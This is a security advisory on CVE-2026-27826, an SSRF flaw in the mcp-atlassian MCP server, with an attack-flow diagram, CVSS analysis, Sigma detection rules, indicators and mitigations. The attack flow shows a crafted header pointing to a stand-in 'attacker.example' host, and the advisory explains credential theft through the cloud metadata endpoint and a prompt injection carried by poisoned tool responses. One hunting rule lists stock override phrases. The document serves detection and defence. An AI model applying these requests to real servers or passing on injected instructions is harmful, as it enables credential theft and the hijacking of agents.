RAXE-2026-034 HIGH CVSS 8.2 v3.1 S2

MCP Atlassian SSRF: Unauthenticated Server-Side Request Forgery Enabling Credential Theft and Prompt Injection (CVE-2026-27826)

S2: Agent Security 2026-03-12 M. Hirani TLP:GREEN
CVE-2026-27826

1. Executive Summary

What: A high-severity server-side request forgery (SSRF) vulnerability exists in mcp-atlassian, a Model Context Protocol (MCP) server for Atlassian Jira and Confluence, affecting all versions prior to 0.17.0 (GHSA-7r34-79r5-rcc9). Tracked as CVE-2026-27826 with a CNA-submitted CVSS base score of 8.2 High (NVD status: Awaiting Analysis), the vulnerability allows an unauthenticated attacker who can reach the MCP server's HTTP endpoint to force outbound requests to arbitrary attacker-controlled URLs by injecting values into the X-Atlassian-Jira-Url or X-Atlassian-Confluence-Url headers (GHSA-7r34-79r5-rcc9). Exploitation requires that HTTP transport be enabled via --transport streamable-http or --transport sse; deployments using the default stdio transport are not affected (GHSA-7r34-79r5-rcc9).

So What: The vulnerability enables three distinct attack outcomes confirmed by the advisory: internal network reconnaissance, cloud credential theft via instance metadata endpoints, and prompt injection through attacker-controlled API responses injected into LLM context (GHSA-7r34-79r5-rcc9). The flaw exists at the HTTP middleware layer rather than in tool-level code, meaning standard code review of MCP tool implementations would not detect it (GHSA-7r34-79r5-rcc9). This represents an early example of a security flaw in the MCP server ecosystem, a rapidly expanding category of AI agent infrastructure where middleware authentication handling introduces a distinct security boundary that has not been systematically audited across the ecosystem (RAXE assessment).

Now What: Organisations running mcp-atlassian with HTTP transport should upgrade to version 0.17.0 or later immediately (GHSA-7r34-79r5-rcc9, PyPI). Security teams should audit all deployed MCP servers for similar header-injection patterns, particularly where middleware processes custom HTTP headers to configure backend service URLs (RAXE assessment).

2. Risk Rating

Dimension Rating Detail
Severity HIGH CVSS 8.2 High: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N (CNA-submitted via GHSA-7r34-79r5-rcc9; NVD status: Awaiting Analysis)
Urgency MEDIUM Patch available (0.17.0, released 2026-02-24); no confirmed in-the-wild exploitation; EPSS 0.00037 / 10.8th percentile (FIRST.org EPSS, 2026-03-11)
Scope CHANGED (S:C) The SSRF allows the attacker to redirect server-side requests to systems beyond the MCP server itself, including internal services and cloud metadata endpoints (GHSA-7r34-79r5-rcc9)
Confidence HIGH CVE assigned, vendor advisory published, patch released, fix commit available (GHSA-7r34-79r5-rcc9, NVD)
Business Impact HIGH Cloud credential theft via SSRF to instance metadata; internal network reconnaissance; chained prompt injection into LLM context (GHSA-7r34-79r5-rcc9). Impact is bounded by the AV:A (adjacent network) attack vector; the attacker must be able to reach the MCP server's HTTP interface (RAXE assessment)

CVSS Score Provenance

The NVD entry for CVE-2026-27826 lists a CNA-submitted CVSS base score of 8.2 with type "Secondary" (source: security-advisories@github.com) (NVD). NVD has not completed its own analysis (vulnStatus: Awaiting Analysis) and no NVD Primary score has been assigned (NVD). The CVSS score cited throughout this publication is the CNA-submitted score from the GHSA advisory and has not been independently assessed by NVD.

EPSS: 0.00037 (10.8th percentile), indicating a low current probability of exploitation in the wild (FIRST.org EPSS, as of 2026-03-16; revalidate at publication time).

3. Affected Products

Product Registry Affected Versions Fixed Version Fix Commit Source
mcp-atlassian PyPI < 0.17.0 0.17.0 sooperset/mcp-atlassian@5cd697d GHSA-7r34-79r5-rcc9

Package details: mcp-atlassian is an open-source Model Context Protocol server enabling AI integration with Atlassian Jira and Confluence (PyPI). The package is maintained by sooperset and released under the MIT licence (PyPI). Version 0.17.0 was published to PyPI on 2026-02-24 and requires Python >= 3.10 (PyPI).

Am I Affected?

  1. Check if the package is installed: pip show mcp-atlassian or search your environment's dependency list for mcp-atlassian
  2. Check the installed version: pip show mcp-atlassian | grep Version; any version below 0.17.0 is vulnerable (GHSA-7r34-79r5-rcc9)
  3. Check the transport mode: review the startup command or configuration for --transport streamable-http or --transport sse; only HTTP transport deployments are affected (GHSA-7r34-79r5-rcc9)
  4. If using stdio transport (the default), the vulnerability is not exploitable regardless of version (GHSA-7r34-79r5-rcc9)
  5. Check network exposure: determine whether the MCP server's HTTP endpoint is reachable from untrusted network segments; the CVSS vector specifies AV:A (adjacent network) (GHSA-7r34-79r5-rcc9)

4. Abstract

This report covers CVE-2026-27826, an SSRF vulnerability in mcp-atlassian, the Model Context Protocol server for Atlassian Jira and Confluence (GHSA-7r34-79r5-rcc9). The vulnerability spans two code layers: HTTP middleware that extracts custom service URL headers without validation (main.py:436-448) and dependency provider logic that uses the untrusted URL to instantiate API clients and immediately trigger outbound HTTP requests (dependencies.py:189-217 for Jira, dependencies.py:341-393 for Confluence) (GHSA-7r34-79r5-rcc9).

When an attacker sends an HTTP request containing an X-Atlassian-Jira-Url or X-Atlassian-Confluence-Url header with a corresponding personal access token header but without an Authorization header, the middleware interprets this as a PAT authentication flow and passes the attacker-controlled URL to the dependency provider, which constructs an API client and calls get_current_user_account_id(), triggering an outbound HTTP request to the attacker's URL (GHSA-7r34-79r5-rcc9). The advisory confirms three impact categories: internal network reconnaissance, cloud credential theft via instance metadata endpoints, and prompt injection through attacker-controlled responses injected into LLM context (GHSA-7r34-79r5-rcc9).

The vulnerability is notable as a concrete example of security flaws in MCP server middleware, a component class that sits between the transport layer and AI tool implementations and is not covered by tool-level security auditing (RAXE assessment).

5. Key Findings

  1. SSRF via unvalidated service URL headers: The mcp-atlassian HTTP middleware accepts X-Atlassian-Jira-Url and X-Atlassian-Confluence-Url headers without any allowlist verification or private IP range checks, passing attacker-controlled URLs directly to API client constructors (GHSA-7r34-79r5-rcc9).

  2. Middleware-layer vulnerability: The flaw exists in the HTTP middleware and dependency injection code (main.py:436-448, dependencies.py:189-217, dependencies.py:341-393), not in the MCP tool handlers themselves. This means tool-level code review would not identify the vulnerability (GHSA-7r34-79r5-rcc9).

  3. Three confirmed impact categories: The advisory explicitly confirms internal network reconnaissance, cloud credential theft (via instance metadata endpoints such as AWS IMDSv1), and prompt injection via poisoned API responses (GHSA-7r34-79r5-rcc9).

  4. Chained SSRF-to-prompt-injection path: Once the attacker-controlled fetcher is cached in request state, all subsequent Jira/Confluence tool responses for that session originate from the attacker's server, allowing injection of malicious content into the LLM context as if it were legitimate Atlassian data (GHSA-7r34-79r5-rcc9). The actual impact of this prompt injection depends on how the downstream LLM framework handles tool responses; additional sanitisation layers may mitigate the injection (RAXE assessment).

  5. Transport prerequisite limits exposure: Only HTTP transport deployments (--transport streamable-http or --transport sse) are affected; stdio deployments are immune (GHSA-7r34-79r5-rcc9). The CVSS vector specifies AV:A (adjacent network), further limiting the attack surface to hosts that can reach the MCP server's listening interface (GHSA-7r34-79r5-rcc9).

6. Attack Flow

The following attack flow describes only behaviour confirmed in the GHSA advisory (GHSA-7r34-79r5-rcc9).

                    ATTACKER (adjacent network)
                              |
                              | 1. HTTP request to MCP endpoint
                              |    Headers:
                              |      X-Atlassian-Jira-Url: http://attacker.example/
                              |      X-Atlassian-Jira-Personal-Token: <any-value>
                              |      (no Authorization header)
                              v
                 +----------------------------+
                 |  mcp-atlassian HTTP server  |
                 |  (transport: streamable-    |
                 |   http or sse)              |
                 +----------------------------+
                              |
                              | 2. Middleware (main.py:436-448)
                              |    Detects service URL header
                              |    + no Authorization header
                              |    -> sets auth_type = "pat"
                              |    -> passes URL to dependency
                              |       provider unvalidated
                              v
                 +----------------------------+
                 |  Dependency Provider        |
                 |  (dependencies.py:189-217   |
                 |   or 341-393)               |
                 +----------------------------+
                              |
                              | 3. Constructs JiraConfig /
                              |    ConfluenceConfig with
                              |    attacker URL
                              |
                              | 4. Calls get_current_user_
                              |    account_id() -> outbound
                              |    HTTP request to attacker URL
                              v
              +-------------------------------+
              |  ATTACKER-CONTROLLED SERVER    |
              +-------------------------------+
                    |         |         |
                    v         v         v
               Impact A   Impact B   Impact C
               Internal   Cloud      Prompt
               Recon      Cred       Injection
                          Theft      via LLM
                                     Context

Impact A: Internal Reconnaissance. The MCP server acts as an SSRF proxy, enabling enumeration of internal services, open ports, and network topology from the server's network position (GHSA-7r34-79r5-rcc9).

Impact B: Cloud Credential Theft. On cloud-hosted instances, the SSRF can target instance metadata endpoints (e.g., AWS IMDSv1 at 169.254.169.254) to exfiltrate IAM role credentials, granting the attacker access to cloud resources permitted by that role (GHSA-7r34-79r5-rcc9).

Impact C: Prompt Injection. The attacker-controlled URL response is processed as if it were a legitimate Atlassian API response; once the fetcher is cached in request state, all tool responses for that session originate from the attacker's server, enabling injection of malicious content into the LLM context (GHSA-7r34-79r5-rcc9). The downstream impact of this injection depends on how the LLM framework processes tool responses; frameworks with response sanitisation may limit the effectiveness of the injection (RAXE assessment).

7. Technical Details

7.1 Vulnerability Mechanism

The vulnerability spans two code layers within the mcp-atlassian server (GHSA-7r34-79r5-rcc9):

Middleware header extraction (main.py:436-448): When the middleware receives an HTTP request containing X-Atlassian-Jira-Url (or X-Atlassian-Confluence-Url) headers without an Authorization header, it sets the authentication type to pat (personal access token) and passes the untrusted URL value to the dependency provider without allowlist verification or private IP range checks (GHSA-7r34-79r5-rcc9).

Dependency provider instantiation (Jira: dependencies.py:189-217; Confluence: dependencies.py:341-393): The dependency provider uses the attacker-supplied header value directly to instantiate a JiraConfig (or ConfluenceConfig) object and immediately invokes get_current_user_account_id(), which makes an outbound HTTP request to the attacker-controlled URL (GHSA-7r34-79r5-rcc9). The resulting fetcher object is cached in request state for subsequent tool calls in that session (GHSA-7r34-79r5-rcc9).

7.2 Attack Prerequisites

All four conditions must be met for exploitation (GHSA-7r34-79r5-rcc9):

  1. The MCP server is running with HTTP transport enabled (--transport streamable-http or --transport sse)
  2. The HTTP request includes X-Atlassian-Jira-Url or X-Atlassian-Confluence-Url with an attacker-controlled value
  3. The HTTP request includes the corresponding personal access token header (X-Atlassian-Jira-Personal-Token or X-Atlassian-Confluence-Personal-Token) with any non-empty value
  4. The HTTP request does not include an Authorization header; its absence triggers the PAT code path

7.3 Three Impact Categories

Internal network reconnaissance (GHSA-7r34-79r5-rcc9): The MCP server functions as an SSRF proxy, enabling "reconnaissance of internal services (databases, internal APIs, microservices) not directly reachable from outside the network" from the server's network position.

Cloud credential theft (GHSA-7r34-79r5-rcc9): On cloud-hosted instances, the advisory states that "any network-reachable attacker can potentially steal the server's IAM role credentials via the instance metadata service, gaining full access to all cloud resources that role permits" by targeting 169.254.169.254.

Prompt injection via poisoned API response (GHSA-7r34-79r5-rcc9): The advisory describes that "once the attacker-controlled fetcher is cached in request.state, all Jira tool responses for that session originate from the attacker's server. The attacker can return crafted API responses containing LLM instructions, injecting those instructions into the AI agent's context as if they were legitimate Jira data."

7.4 CVSS Vector Analysis

Metric Value Interpretation
Attack Vector (AV) Adjacent (A) Attacker must reach the MCP server's HTTP interface, typically limited to the local network segment (GHSA-7r34-79r5-rcc9)
Attack Complexity (AC) Low (L) No special conditions or race conditions required (GHSA-7r34-79r5-rcc9)
Privileges Required (PR) None (N) Unauthenticated; the attack exploits the absence of an Authorization header (GHSA-7r34-79r5-rcc9)
User Interaction (UI) None (N) No user action required (GHSA-7r34-79r5-rcc9)
Scope (S) Changed (C) The SSRF redirects requests to systems beyond the vulnerable MCP server (GHSA-7r34-79r5-rcc9)
Confidentiality (C) High (H) Cloud credential theft, internal service enumeration (GHSA-7r34-79r5-rcc9)
Integrity (I) Low (L) Prompt injection via poisoned responses (GHSA-7r34-79r5-rcc9)
Availability (A) None (N) No denial-of-service impact described (GHSA-7r34-79r5-rcc9)

Authentication language: The CVSS vector specifies PR:N, confirming that the vulnerability is exploitable by an unauthenticated attacker. The AV:A (adjacent network) vector indicates that the attack surface is limited to hosts that can reach the MCP server's HTTP interface; this is distinct from AV:N (network) and meaningfully constrains the attacker population (GHSA-7r34-79r5-rcc9).

7.5 Default Deployment Configuration

The GHSA advisory notes that the default deployment configuration uses HOST=0.0.0.0, which exposes the MCP server to all network interfaces (GHSA-7r34-79r5-rcc9). Organisations that have not restricted the listening interface may have broader exposure than the AV:A vector implies (RAXE assessment).

8. Confidence & Validation

Assessment Confidence: High

Aspect Status Detail
Vendor Advisory Published GHSA-7r34-79r5-rcc9, published 2026-02-24 (GHSA-7r34-79r5-rcc9)
CVE Assigned Yes CVE-2026-27826, published to NVD 2026-03-10 (NVD)
NVD Analysis Awaiting Analysis vulnStatus: Awaiting Analysis; CVSS score is CNA-submitted (type: Secondary), not NVD Primary (NVD)
EPSS 0.00037 / 10.8th percentile Low exploitation probability (FIRST.org EPSS, 2026-03-11)
Patch Available Yes 0.17.0 released 2026-02-24 (PyPI)
Fix Commit Available sooperset/mcp-atlassian@5cd697d (GHSA-7r34-79r5-rcc9, NVD)
PoC Available Advisory-included The GHSA advisory includes a working proof-of-concept with a Python listener script and HTTP request sequence demonstrating the full SSRF chain (GHSA-7r34-79r5-rcc9)
Exploited in Wild Not confirmed No evidence of in-the-wild exploitation at time of writing (RAXE assessment)

Admiralty Grade: B2: Usually reliable source, corroborated information.

Key Assumptions:

# Assumption Confidence Impact if Wrong
1 HTTP transport is not the default configuration, limiting exposed attack surface Medium If HTTP is default in common deployment guides, more instances are affected than assessed
2 The AV:A vector is accurate; most MCP servers listen only on localhost or internal interfaces Medium The advisory notes default HOST=0.0.0.0; if commonly used, exposure is broader
3 Prompt injection impact requires the LLM to process the SSRF response without additional validation High If LLM frameworks sanitise tool responses, the prompt injection chain is broken

9. Detection Signatures

Four Sigma detection rules are provided, covering delivery telemetry, outbound SSRF indicators, prompt injection hunting, and posture assessment.

Rule 1: SSRF via Injected Atlassian Service URL Headers

Classification: Delivery telemetry CVE: CVE-2026-27826 CWE: CWE-918

title: MCP Atlassian SSRF via Injected Service URL Header
id: raxe-2026-034-r1
status: experimental
description: >
  Detects HTTP requests to an mcp-atlassian server containing
  X-Atlassian-Jira-Url or X-Atlassian-Confluence-Url headers without
  an Authorization header. This combination triggers the PAT
  authentication code path, which uses the untrusted header value to
  make outbound requests without URL validation
  (GHSA-7r34-79r5-rcc9).
references:
  - https://github.com/sooperset/mcp-atlassian/security/advisories/GHSA-7r34-79r5-rcc9
  - https://nvd.nist.gov/vuln/detail/CVE-2026-27826
author: RAXE Labs
date: 2026-03-11
tags:
  - attack.initial_access
  - cve.2026.27826
  - cwe.918
logsource:
  category: webserver
  product: any
detection:
  selection_jira:
    cs-header-x-atlassian-jira-url|exists: true
    cs-header-x-atlassian-jira-personal-token|exists: true
  selection_confluence:
    cs-header-x-atlassian-confluence-url|exists: true
    cs-header-x-atlassian-confluence-personal-token|exists: true
  filter_no_auth:
    cs-header-authorization: ''
  condition: (selection_jira or selection_confluence) and filter_no_auth
falsepositives:
  - Legitimate MCP client connections using header-based configuration without Bearer auth
  - Requires log source that captures custom HTTP request headers
level: medium

Rule 2: MCP Server Outbound Request to Internal or Metadata Endpoint

Classification: Delivery telemetry CVE: CVE-2026-27826 CWE: CWE-918

Detection gap: This rule covers SSRF to internal/metadata targets but does not detect outbound SSRF to attacker-controlled external URLs. The advisory PoC demonstrates SSRF to an external listener, which triggers GET /rest/api/2/myself to the attacker's server (GHSA-7r34-79r5-rcc9). Detecting external SSRF requires environment-specific tuning (allowlisting the configured Atlassian base URL and alerting on outbound /rest/api/2/myself requests to non-configured domains), which is beyond the scope of a generic Sigma rule (RAXE assessment). See Section 11 Network Indicators for the external SSRF pattern.

title: MCP Atlassian SSRF Outbound Request to Internal Network
id: raxe-2026-034-r2
status: experimental
description: >
  Detects outbound HTTP requests from an mcp-atlassian server process
  targeting private IP ranges (RFC 1918), localhost, or cloud metadata
  endpoints. The SSRF vulnerability allows attackers to force outbound
  requests to arbitrary URLs, including internal services and cloud
  credential endpoints (GHSA-7r34-79r5-rcc9). Note: this rule does
  not detect SSRF to external attacker-controlled URLs -- see the
  detection gap note above (RAXE assessment).
  Requires network monitoring or egress proxy logs that can identify
  MCP server process traffic (RAXE assessment).
references:
  - https://github.com/sooperset/mcp-atlassian/security/advisories/GHSA-7r34-79r5-rcc9
  - https://nvd.nist.gov/vuln/detail/CVE-2026-27826
author: RAXE Labs
date: 2026-03-11
tags:
  - attack.lateral_movement
  - cve.2026.27826
  - cwe.918
logsource:
  category: proxy
  product: any
detection:
  selection_private:
    r-dns|startswith:
      - '10.'
      - '172.16.'
      - '172.17.'
      - '172.18.'
      - '172.19.'
      - '172.20.'
      - '172.21.'
      - '172.22.'
      - '172.23.'
      - '172.24.'
      - '172.25.'
      - '172.26.'
      - '172.27.'
      - '172.28.'
      - '172.29.'
      - '172.30.'
      - '172.31.'
      - '192.168.'
      - '127.'
  selection_metadata:
    r-dns|contains: '169.254.169.254'
  condition: selection_private or selection_metadata
falsepositives:
  - Legitimate mcp-atlassian connections to internal Jira/Confluence instances
  - Requires correlation with mcp-atlassian process identity to reduce noise
level: medium

Rule 3: Anomalous Atlassian API Response Content in MCP Context (Hunting)

Classification: Hunting rule CVE: CVE-2026-27826

title: Hunting -- Anomalous Content in MCP Atlassian Tool Response
id: raxe-2026-034-r3
status: experimental
description: >
  Hunting rule to detect potential prompt injection via SSRF-poisoned
  Atlassian API responses. When an attacker controls the URL via the
  SSRF, the response is processed as a legitimate Atlassian API
  response and injected into LLM context (GHSA-7r34-79r5-rcc9).
  This rule looks for common prompt injection patterns in MCP tool
  responses. Requires application-level logging of MCP tool
  responses, which is not standard (RAXE assessment).
references:
  - https://github.com/sooperset/mcp-atlassian/security/advisories/GHSA-7r34-79r5-rcc9
author: RAXE Labs
date: 2026-03-11
tags:
  - attack.execution
  - cve.2026.27826
logsource:
  category: application
  product: mcp
detection:
  selection:
    tool_name|contains: 'atlassian'
  keywords:
    response|contains:
      - 'ignore previous instructions'
      - 'system prompt'
      - 'you are now'
      - 'disregard all'
  condition: selection and keywords
falsepositives:
  - Legitimate Jira/Confluence content discussing AI or prompt engineering
  - High false positive rate expected -- manual review required
level: medium

Rule 4: MCP Atlassian HTTP Transport Exposure Check (Posture)

Classification: Posture/exposure rule

title: MCP Atlassian Running with HTTP Transport
id: raxe-2026-034-r4
status: experimental
description: >
  Posture rule to identify mcp-atlassian instances running with HTTP
  transport enabled. Only HTTP transport (streamable-http or SSE)
  exposes the SSRF attack surface; stdio transport is not affected
  (GHSA-7r34-79r5-rcc9). Requires process argument or configuration
  audit (RAXE assessment).
references:
  - https://github.com/sooperset/mcp-atlassian/security/advisories/GHSA-7r34-79r5-rcc9
author: RAXE Labs
date: 2026-03-11
tags:
  - attack.reconnaissance
logsource:
  category: process_creation
  product: any
detection:
  selection:
    CommandLine|contains:
      - 'mcp-atlassian'
      - 'mcp_atlassian'
  filter_http:
    CommandLine|contains:
      - '--transport streamable-http'
      - '--transport sse'
  condition: selection and filter_http
falsepositives:
  - Intentional HTTP transport usage on patched versions (>= 0.17.0)
level: low

10. Detection & Mitigation

Detection Guidance

Network-level detection: Rule 1 detects the inbound SSRF trigger by looking for the combination of custom Atlassian service URL headers (X-Atlassian-Jira-Url or X-Atlassian-Confluence-Url) without an Authorization header in web server access logs (RAXE assessment). This requires a log source that captures custom HTTP request headers, which is not standard in all web server configurations (RAXE assessment). Rule 2 detects the outbound SSRF request by monitoring for connections from the MCP server process to RFC 1918 private ranges, localhost, or cloud metadata endpoints; this requires egress proxy or network monitoring that can attribute traffic to the MCP server process (RAXE assessment).

Application-level detection: Rule 3 is a hunting rule that searches for common prompt injection patterns in MCP tool responses (RAXE assessment). It requires application-level logging of MCP tool response content, which is not a standard capability in most MCP server deployments (RAXE assessment). This rule has a high expected false positive rate and is intended for analyst-guided hunting rather than automated alerting (RAXE assessment).

Posture assessment: Rule 4 identifies mcp-atlassian instances running with HTTP transport enabled via process command-line argument monitoring (RAXE assessment). This rule assists in exposure assessment rather than active exploitation detection (RAXE assessment).

Mitigation Recommendations

  1. Upgrade to 0.17.0 or later; this is the primary remediation (GHSA-7r34-79r5-rcc9, PyPI). Version 0.17.0 was released on 2026-02-24 (PyPI).

  2. Audit transport configuration; verify whether MCP servers in the environment use HTTP transport; stdio-only deployments are not affected regardless of version (GHSA-7r34-79r5-rcc9).

  3. Restrict listening interface; the advisory notes that the default deployment uses HOST=0.0.0.0, which exposes the server on all interfaces (GHSA-7r34-79r5-rcc9). Bind the MCP server to 127.0.0.1 or a specific internal interface to limit the attack surface (RAXE assessment).

  4. Enable IMDSv2; on AWS-hosted instances, enforce IMDSv2 (Instance Metadata Service Version 2) to require token-based requests for metadata access, mitigating the cloud credential theft vector (RAXE assessment).

  5. Network segmentation; ensure MCP server HTTP endpoints are not reachable from untrusted network segments (RAXE assessment).

  6. MCP middleware audit; review all deployed MCP servers for header-based URL injection patterns in middleware and authentication handling code (RAXE assessment). The vulnerability pattern (custom HTTP headers used to configure backend service URLs without validation) may exist in other MCP server implementations (RAXE assessment).

11. Indicators of Compromise

Behavioural Indicators

Type Indicator Context Source
HTTP Header X-Atlassian-Jira-Url containing non-Atlassian domain Inbound request to MCP server without Authorization header GHSA-7r34-79r5-rcc9
HTTP Header X-Atlassian-Confluence-Url containing non-Atlassian domain Inbound request to MCP server without Authorization header GHSA-7r34-79r5-rcc9
Outbound connection MCP server process connecting to RFC 1918 ranges, 127.0.0.0/8, or 169.254.169.254 SSRF outbound request triggered by middleware GHSA-7r34-79r5-rcc9
Outbound connection MCP server process connecting to external IP/domain not matching configured Atlassian instance SSRF redirection to attacker-controlled server RAXE assessment
Application log MCP tool response containing prompt injection patterns (e.g., "ignore previous instructions") Poisoned API response from attacker-controlled URL injected into LLM context GHSA-7r34-79r5-rcc9
Process argument mcp-atlassian or mcp_atlassian with --transport streamable-http or --transport sse on versions < 0.17.0 Vulnerable deployment exposed to attack GHSA-7r34-79r5-rcc9

Network Indicators

Type Pattern Notes
Outbound HTTP GET /rest/api/2/myself to non-Atlassian IP The SSRF triggers get_current_user_account_id() which issues this Jira API call (GHSA-7r34-79r5-rcc9)
Outbound HTTP GET /latest/meta-data/iam/security-credentials/ to 169.254.169.254 AWS IMDSv1 credential theft attempt (GHSA-7r34-79r5-rcc9)

12. Strategic Context

MCP Ecosystem Security Implications

The Model Context Protocol (MCP) ecosystem is expanding rapidly as organisations adopt AI agents that interact with enterprise tools (RAXE assessment). CVE-2026-27826 illustrates a vulnerability class that is specific to MCP server architecture: the middleware layer that handles transport, authentication, and dependency injection sits between the HTTP interface and the tool implementation code, creating a security boundary that standard tool-level code review does not cover (GHSA-7r34-79r5-rcc9, RAXE assessment).

Middleware as an Attack Surface

The vulnerability pattern (custom HTTP headers used to configure backend service URLs without validation) is not unique to mcp-atlassian (RAXE assessment). Any MCP server that supports HTTP transport and accepts header-based configuration of backend service endpoints without allowlist validation may be susceptible to similar SSRF attacks (RAXE assessment). The chained SSRF-to-prompt-injection path is particularly significant because it demonstrates how a network-layer vulnerability in AI agent infrastructure can escalate to manipulation of the LLM's behaviour through the data plane (RAXE assessment).

MITRE ATLAS Mapping

This vulnerability maps to MITRE ATLAS technique AML.T0010.001 (AI Supply Chain Compromise: AI Software), as the vulnerability exists in a software component within the AI agent supply chain, specifically the MCP server that provides tool access to the LLM (ATLAS).

Disclosure Timeline

Date Event Source
2026-02-24 GHSA advisory published; patch (0.17.0) released to PyPI GHSA-7r34-79r5-rcc9, PyPI
2026-03-10 CVE-2026-27826 published to NVD (Awaiting Analysis) NVD
2026-03-11 RAXE Labs signal detection and analysis RAXE Labs

13. References

  1. CVE-2026-27826, NVD — National Vulnerability Database entry (vulnStatus: Awaiting Analysis)
  2. GHSA-7r34-79r5-rcc9 — GitHub Security Advisory (primary source)
  3. Fix Commit: sooperset/mcp-atlassian@5cd697d — Patch commit
  4. mcp-atlassian 0.17.0, PyPI — Fixed version on Python Package Index
  5. EPSS, CVE-2026-27826 — FIRST.org Exploit Prediction Scoring System
  6. CWE-918: Server-Side Request Forgery (SSRF) — MITRE CWE
  7. AML.T0010.001: AI Supply Chain Compromise: AI Software — MITRE ATLAS